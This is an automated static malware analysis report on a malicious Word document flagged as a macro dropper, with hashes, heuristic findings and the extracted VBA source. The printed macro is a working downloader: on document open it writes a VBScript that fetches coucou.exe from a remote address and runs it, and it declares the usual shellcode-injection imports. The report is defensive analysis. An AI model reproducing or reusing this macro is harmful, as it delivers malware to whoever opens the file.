Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e971d42adff2e5da…

MALICIOUS

Office (OOXML)

21.4 KB Created: 2020-09-30 18:12:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-11-12
MD5: 063a024fc7342d3be04975d6a15eb972 SHA-1: 9e3607e90f6c86490c8b98451fa8fe8a3880399a SHA-256: e971d42adff2e5dad89577014725d1ad7b325bcd8cb2de5c179b83fe748f5de5
430 Risk Score

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell "wscript " & Environ("Temp") & "\charlie.vbs"""
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Print #CoucouFile, "Set WshShell = WScript.CreateObject(""Wscript.Shell"")"
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
        Print #CoucouFile, "Set WshShell = WScript.CreateObject(""Wscript.Shell"")"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Print #CoucouFile, "HTTPDownload ""http://192.168.0.12:8000/coucou.exe"", WScript.CreateObject(""Scripting.FileSystemObject"").GetSpecialFolder(2)"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        FilePath = Environ("Temp") & "\charlie.vbs"
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.0.12:8000/coucou.exe Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2994 bytes
SHA-256: f0cd55cffc5e96229474c3186f5e01ed0321ad04f094e786b74e9043a1d4c793
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function CTAlias Lib "kernel32" Alias "CreateThread" (ByVal Vfelctwd As Long, ByVal Cbaepxvp As Long, ByVal Qhebs As LongPtr, Lrdxntklk As Long, ByVal Okhucubak As Long, Jrteao As Long) As LongPtr
    Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Nugwd As Long, ByVal Rtdpu As Long, ByVal Laxyvjart As Long, ByVal Glw As Long) As LongPtr
    Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Xisnfgysv As LongPtr, ByRef Qal As Any, ByVal Qvtmucmwz As Long) As LongPtr
#Else
    Private Declare Function CTAlias Lib "kernel32" Alias "CreateThread" (ByVal Vfelctwd As Long, ByVal Cbaepxvp As Long, ByVal Qhebs As Long, Lrdxntklk As Long, ByVal Okhucubak As Long, Jrteao As Long) As Long
    Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Nugwd As Long, ByVal Rtdpu As Long, ByVal Laxyvjart As Long, ByVal Glw As Long) As Long
    Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Xisnfgysv As Long, ByRef Qal As Any, ByVal Qvtmucmwz As Long) As Long
#End If
Sub Open()
    Dim CoucouFile As Integer
    Dim FilePath As String
    FilePath = Environ("Temp") & "\charlie.vbs"
    CoucouFile = FreeFile
    Open FilePath For Output As CoucouFile
    Print #CoucouFile, "HTTPDownload ""http://192.168.0.12:8000/coucou.exe"", WScript.CreateObject(""Scripting.FileSystemObject"").GetSpecialFolder(2)"
    Print #CoucouFile, "Sub HTTPDownload(myURL, myPath)"
    Print #CoucouFile, "Dim i, objFile, objFSO, objHTTP, strFile, strMsg"
    Print #CoucouFile, "Const ForReading = 1, ForWriting = 2, ForAppending = 8"
    Print #CoucouFile, "Set objFSO = CreateObject(""Scripting.FileSystemObject"")"
    Print #CoucouFile, "strFile = objFSO.BuildPath(mypath, Mid(myURL, InStrRev(myURL, ""/"") + 1))"
    Print #CoucouFile, "Set objHTTP = CreateObject(""WinHttp.WinHttpRequest.5.1"")"
    Print #CoucouFile, "Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True )"
    Print #CoucouFile, "objHTTP.Open ""GET"", myURL, False"
    Print #CoucouFile, "objHTTP.Send"
    Print #CoucouFile, "For i = 1 To LenB( objHTTP.ResponseBody )"
    Print #CoucouFile, "objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )"
    Print #CoucouFile, "Next"
    Print #CoucouFile, "objFile.Close( )"
    Print #CoucouFile, "Set WshShell = WScript.CreateObject(""Wscript.Shell"")"
    Print #CoucouFile, "WshShell.Run WScript.CreateObject(""Scripting.FileSystemObject"").GetSpecialFolder(2) & ""coucou.exe"""
    Print #CoucouFile, "End Sub"
    Close CoucouFile
    Shell "wscript " & Environ("Temp") & "\charlie.vbs"""
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 15872 bytes
SHA-256: 524c71d3773455816649ff9a736255a1fda804909b64e92fa3a5af8778dfc6bc
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.